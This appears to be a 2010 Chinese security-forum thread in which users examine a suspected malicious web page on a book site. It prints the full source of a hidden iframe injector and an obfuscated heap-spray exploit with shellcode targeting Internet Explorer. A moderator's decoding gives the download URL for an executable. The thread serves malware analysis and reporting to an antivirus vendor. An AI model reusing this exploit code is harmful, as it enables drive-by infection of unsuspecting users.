刚刚碰到的一个网页,天涯书城

weijinkun4

hxxp://www.tianyabook.com/xueshulunwen/82.htm


以前没碰到过,网页溢出什么意思?

qigang

溢出就溢出呗。

IllusionWing

加载 - http://www.tianyabook.com/xueshulunwen/82.htm
加载 - http://www.tianyabook.com/xueshulunwen/82.htm?UpdatedPage=aGlqYWNr
加载 - http://cg.lvbao.info/g.htm (不能访问)

幸福的猪猪

今天早上可以解析挂马网页了。

hxxp://cg.lvbao.info/g.htm

1. 
   
2. <div style='display:none'>
   
3. <script type="text/javascript">
   
4. function goad(){
   
5. var Then = new Date()
   
6. Then.setTime(Then.getTime() + 2*60*60*1000)
   
7. var cookieString = new String(document.cookie)
   
8. var cookieHeader = "Cookier1="
   
9. var beginPosition = cookieString.indexOf(cookieHeader)
   
10. if (beginPosition != -1){
    
11. } else
    
12. { document.cookie = "Cookier1=Filter;expires="+ Then.toGMTString()
    
13. document.write('<iframe src="demo.htm" width="50" height="0" frameborder="0"></iframe>');
    
14. }
    
15. }goad();
    
16. </script>
    
17. </div>
    
18. <script type="text/javascript" src="http://js.tongji.linezing.com/1423305/tongji.js"></script><noscript><a href="http://www.linezing.com"><img src="http://img.tongji.linezing.com/1423305/tongji.gif"/></a></noscript>
    

复制代码

由上面那个网页代码获取相关代码：

hxxp://cg.lvbao.info/demo.htm

1. 
   
2. <html><body>
   
3. <button id='CsmMqKNVNVDOwuXGpbpsdkJPThIWYKYNSCxcwLLAXhPJTjepQRWUjKIceYHUKOYhLwVlmADTuzcfzGejcKP' onclick='hAPrzQYuoZVLqtJdRuKwFkDCRUD();' style='display:none'></button>
   
4. <script language='javascript'>
   
5. function ezBvyEiXxOYURLMrKjswfJYjHsgQfxDJWEdfwqmBeelAdectrTLSDTQTPhSmbyjmvQPZmiuwmyFhfRdPrfvFSMbnJv(){
   
6. var cDkJbPffBIxhAcWjezNyvbHDzsckUazqDdqVXjNDiZfjquZWOcEN = unescape('%u99f8%u4647%u964f%u924f%u9791%u9799%u4898%u3796%u4a96%u4298%u494e%ud648%uf99f%u3797%u9337%u9240%u9643%u4e4a%u2f42%ud646%u98f9%u4798%u46fc%u4399%u4f97%u3f91%u41d6%u4149%u4297%ufd42%u4693%u3f9b%u92f5%uf592%uf92f%u99f9%u4793%u4afd%u97f9%uf8d6%u9f93%u46d6%uf89b%u4f4e%uf949%u9149%u9f42%ud62f%u4296%uf837%u402f%u9848%u9947%u4791%u924b%u9849%u9b2f%u974b%u4746%u96f9%u9041%u4f4a%u923f%u4299%u9896%u4143%uf992%u98fc%u4697%u3798%u484e%u98fd%u4a92%u4143%ufd37%u4b4a%u4e4b%u96d6%u9f48%u9193%u3f91%u4396%u92f5%u962f%u9290%u46f9%uf847%u96fd%u924e%u9137%ufd96%u4793%uf8f9%u904f%u4e9b%u372f%uf991%u4998%u2f42%u98f5%uf998%u4992%u4efc%u4ff5%u3797%uf846%u4af5%ufc40%u4399%u4a4b%u9198%uf5fc%u3f37%u4747%u9841%u99d6%u40f5%u9b47%u9b42%u4afd%u9b42%ud63f%u4b47%u9037%u4f3f%u4e4a%u9b48%uf992%ufd4e%uf8f8%u9bfd%u4949%uf941%ud646%ufd4f%u4af9%ufc93%u434b%u3f98%u9642%u9092%u4690%uf991%u9b4a%u4796%u464a%u3f47%u414e%u4af8%u984f%u4242%ufc98%ud6f8%u904e%ud698%u9998%u9140%uf948%u4949%u3799%u4890%u98fd%u3f9b%u9f43%u4f96%u4696%u4042%u939b%u4f49%ufd48%ud69f%u42f8%uf948%ud642%u4e99%u4b40%u999f%u9943%u41fd%u9743%u934e%u4f2f%u42fd%u4946%u9f90%u919f%u4b2f%ud640%u4249%u9296%u414a%ud69f%u2f37%u99f9%ufd4a%uf592%u4992%u9793%ufd4e%u402f%u3746%u9941%u4f2f%u9147%u929b%u43f8%u9999%u9337%u99d6%uf549%u48fc%u9f43%uf991%u4b43%u4041%uf84f%ud697%u439b%u3790%uf9fd%ud641%uf946%uf5fc%u9991%ud696%uf841%u4637%u4946%u9197%u9b42%u9146%u902f%u3737%uf8f8%u934e%u464f%u9992%u4bf5%u96f5%u4391%u9799%ufdfc%u904a%u409b%u4990%u9f48%u4793%u4137%u9147%u9149%u439b%ufc4f%ud691%u474a%u9993%ud6d6%u919f%ud641%u37f5%u2f49%u4b4a%u4f43%u4396%u4041%u4841%u9293%u4048%u9198%u3ff8%ufd49%u4b48%u992f%u93d6%u93f5%ufd9b%u4a9b%u4948%u4937%u484f%u4646%u404e%u4ef9%u434b%u9893%ud69b%u4640%u414f%u2f91%u4993%u9291%u9b93%ufcfd%u489b%u4a37%u4b37%ufcf5%u422f%u4a4b%uf54f%u4749%u3f46%u4237%u463f%u4f9b%u994a%u9849%u964f%u4697%u9092%ufcf8%u87bb%u6d4e%uebc4%u5e0c%u3156%uad1e%uc301%uc085%uf775%ue8c3%uffef%uffff%u8a06%u3639%uecf7%ua629%u595d%u0e9d%ue407%u91dd%u2247%u0b14%ub1a5%u2ec3%uadc1%uceeb%u42ee%ua858%u3a89%u37a3%u9591%u51bd%uf778%uf464%u1168%uc313%u389e%u3e8d%ua8df%u9b44%u21cd%u051f%ud36b%u2132%ube32%ubf51%u3293%ucb3f%u83d4%u2688%u814c%u556b%u45fb%u99fc%u9691%u8bee%u2fa5%uf5ea%u6cb8%u7a70%u4a02%u6840%u41d6%u3090%u3f4c%u3366%u98ea%u93dc%u0bf5%u06b0%ua9d6%u7c28%uc9b0%u1bd7%u3818%u8171%u2ec2%ua4e2%u549c%u5fbb%u2072%ufdb0%uc3b2%u67ff%ubdab%uc71a%u765f%u91d5%uec91%u4f29%u1c6c%ub035%u461f%ua8df%u9c46%u40bf%u7eb7%uf226%u6d5e%ue53a%u74cf%u0f7a%u3e7a%u7596%uf977%u135d%u8fb9%u413f%ub5df%uce38%u6b23%uab64%u7546%u556a%udce1%uafca%uebd8%ue622%u25bc%uebd9%u7305%u6ae8%uea4b%u1424%u809d%u801c%u4714%udf38%ubf36%ud071%u597c%u2ccd%u9440%uc5aa%u80ea%u5b16%u5455%ufdc1%u6577%ucbe0%u606c%u1301%u708f%u581d%u6185%u7f7b%u9ba5%u60b6%u89bf%u95bb%ua2e2%uaaaf%uaee6%ub8c6%ue9f6%uf1be%ufe06%uec1d%ufb1a%u3307%u0c03%u01da%u0632%u62d9%u4049%u65f7%u8e49%u792d%u9a52%u9136%u8544%u8a5e%uc36f%ua595%ub598%u819a%u1bb3%uf8d4%u51cc%ufdef%u57cf%u21e6%u9ddf%u06fb%u3686%uc370%ufcc8%u0457%u654c%u3686%u13e3%ubfb3%uaa82%u2315%u201b%uc745%ucd8c%u29f7%u4a37%ub66d%uaab7%ub66d');
   
7. PHrbFqkJjYOwHjbpMIzpWUBWrAUTEFKJHjXWZcqIIlycxCKXbaIdBaRCQjejOfcunKPfQXWiKhLiZTQhbrGfIDKcSWzwrUtdlNgs = new Array();
   
8. var JKjsIILQegjJpxGabBPtXGBbXacEiQMOgNcOqQyzCUTDeVdcPuMhGQOnsjlzbvGvGcZQABCFsyjGfKNimmcyUiaq = 0x86000-(cDkJbPffBIxhAcWjezNyvbHDzsckUazqDdqVXjNDiZfjquZWOcEN.length*2);
   
9. var nKxHfzJhOdwycMXiLPOOUelLEWOWVfXLGSsGPoPeKMjByMaLjlCUTqufakhClMUZmiiXVtCgWCtSKKoh = unescape('%u0c0c%u0c0c');
   
10. while(nKxHfzJhOdwycMXiLPOOUelLEWOWVfXLGSsGPoPeKMjByMaLjlCUTqufakhClMUZmiiXVtCgWCtSKKoh.length<JKjsIILQegjJpxGabBPtXGBbXacEiQMOgNcOqQyzCUTDeVdcPuMhGQOnsjlzbvGvGcZQABCFsyjGfKNimmcyUiaq/2) { nKxHfzJhOdwycMXiLPOOUelLEWOWVfXLGSsGPoPeKMjByMaLjlCUTqufakhClMUZmiiXVtCgWCtSKKoh+=nKxHfzJhOdwycMXiLPOOUelLEWOWVfXLGSsGPoPeKMjByMaLjlCUTqufakhClMUZmiiXVtCgWCtSKKoh; }
    
11. var KHElHbbqmGmkYImPNVRPunVjUBSVIdZVJAwwTWKuSBLHXrPeATGEsBGveIiXbTALjIfmaxvq = nKxHfzJhOdwycMXiLPOOUelLEWOWVfXLGSsGPoPeKMjByMaLjlCUTqufakhClMUZmiiXVtCgWCtSKKoh.substring(0,JKjsIILQegjJpxGabBPtXGBbXacEiQMOgNcOqQyzCUTDeVdcPuMhGQOnsjlzbvGvGcZQABCFsyjGfKNimmcyUiaq/2);
    
12. delete nKxHfzJhOdwycMXiLPOOUelLEWOWVfXLGSsGPoPeKMjByMaLjlCUTqufakhClMUZmiiXVtCgWCtSKKoh;
    
13. for(BTHpvbEqqCqKGevXbeIjb=0; BTHpvbEqqCqKGevXbeIjb<270; BTHpvbEqqCqKGevXbeIjb++) {
    
14.   PHrbFqkJjYOwHjbpMIzpWUBWrAUTEFKJHjXWZcqIIlycxCKXbaIdBaRCQjejOfcunKPfQXWiKhLiZTQhbrGfIDKcSWzwrUtdlNgs[BTHpvbEqqCqKGevXbeIjb] = KHElHbbqmGmkYImPNVRPunVjUBSVIdZVJAwwTWKuSBLHXrPeATGEsBGveIiXbTALjIfmaxvq + KHElHbbqmGmkYImPNVRPunVjUBSVIdZVJAwwTWKuSBLHXrPeATGEsBGveIiXbTALjIfmaxvq + cDkJbPffBIxhAcWjezNyvbHDzsckUazqDdqVXjNDiZfjquZWOcEN;
    
15. }
    
16. }
    
17. function hAPrzQYuoZVLqtJdRuKwFkDCRUD(){
    
18. ezBvyEiXxOYURLMrKjswfJYjHsgQfxDJWEdfwqmBeelAdectrTLSDTQTPhSmbyjmvQPZmiuwmyFhfRdPrfvFSMbnJv();   
    
19. var UzGmQbpfDzhwPBGjDAiEEqH = document.createElement('body');
    
20. UzGmQbpfDzhwPBGjDAiEEqH.addBehavior('#default#userData');
    
21. document.appendChild(UzGmQbpfDzhwPBGjDAiEEqH);
    
22. try {
    
23.   for (BTHpvbEqqCqKGevXbeIjb=0; BTHpvbEqqCqKGevXbeIjb<10; BTHpvbEqqCqKGevXbeIjb++) {
    
24.    UzGmQbpfDzhwPBGjDAiEEqH.setAttribute('s',window);
    
25.   }
    
26. } catch(e){ }   
    
27. window.status+='';
    
28. }
    
29. document.getElementById('CsmMqKNVNVDOwuXGpbpsdkJPThIWYKYNSCxcwLLAXhPJTjepQRWUjKIceYHUKOYhLwVlmADTuzcfzGejcKP').onclick();
    
30. </script></body></html>
    

复制代码

Hopesky

回复 4# 幸福的猪猪


    解出来什么？

碎玉醉

卡巴未报

幸福的猪猪

回复 5# Hopesky

我解不出这个疑似挂马网页，所以把源代码粘贴出来。等待高手的解析

250662772

回复  Hopesky

我解不出这个疑似挂马网页，所以把源代码粘贴出来。等待高手的解析
幸福的猪猪 发表于 2010-3-19 06:17

hxxp://dd.loveyyq.com/down.exe

幸福的猪猪

回复 8# 250662772

谢谢楼上版主的解析。为了不让别人误解，我还是把这位版主短信息的原话，粘贴出来。



样本打包，上报卡巴斯基安全实验室。